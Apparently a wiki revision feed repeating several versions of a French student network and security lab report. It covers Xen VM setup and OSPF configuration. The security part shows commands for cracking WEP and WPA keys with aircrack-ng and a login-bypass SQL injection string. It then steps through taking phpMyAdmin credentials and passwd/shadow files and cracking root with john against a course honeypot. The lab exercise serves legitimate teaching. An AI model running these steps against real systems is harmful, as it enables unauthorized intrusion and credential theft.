&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Création de la VM=&lt;br /&gt;
&lt;br /&gt;
SSH sur capbreton&lt;br /&gt;
 xen-create-image&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54109</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54109"/>
				<updated>2020-11-30T15:56:44Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Mise en place de la machine virtuelle Xen */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avecla commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=pasglop --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
On peut alors lancer la VM et s'y connecter :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xen console stropharia&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine en fonction'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Création de la VM=&lt;br /&gt;
&lt;br /&gt;
SSH sur capbreton&lt;br /&gt;
 xen-create-image&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54107</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54107"/>
				<updated>2020-11-30T15:55:26Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Mise en place de la machine virtuelle Xen */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avecla commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=pasglop --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine en fonction'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Création de la VM=&lt;br /&gt;
&lt;br /&gt;
SSH sur capbreton&lt;br /&gt;
 xen-create-image&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54106</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54106"/>
				<updated>2020-11-30T15:52:02Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Mise en place de la machine virtuelle Xen */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avecla commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=pasglop --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
On y retrouve le nom de la machine&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine en fonction'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Création de la VM=&lt;br /&gt;
&lt;br /&gt;
SSH sur capbreton&lt;br /&gt;
 xen-create-image&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54105</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54105"/>
				<updated>2020-11-30T15:51:12Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Mise en place de la machine virtuelle Xen */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avecla commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=pasglop --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine en fonction'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Création de la VM=&lt;br /&gt;
&lt;br /&gt;
SSH sur capbreton&lt;br /&gt;
 xen-create-image&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54104</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54104"/>
				<updated>2020-11-30T15:50:55Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Installation de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du tp avecla commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=pasglop --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine en fonction'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
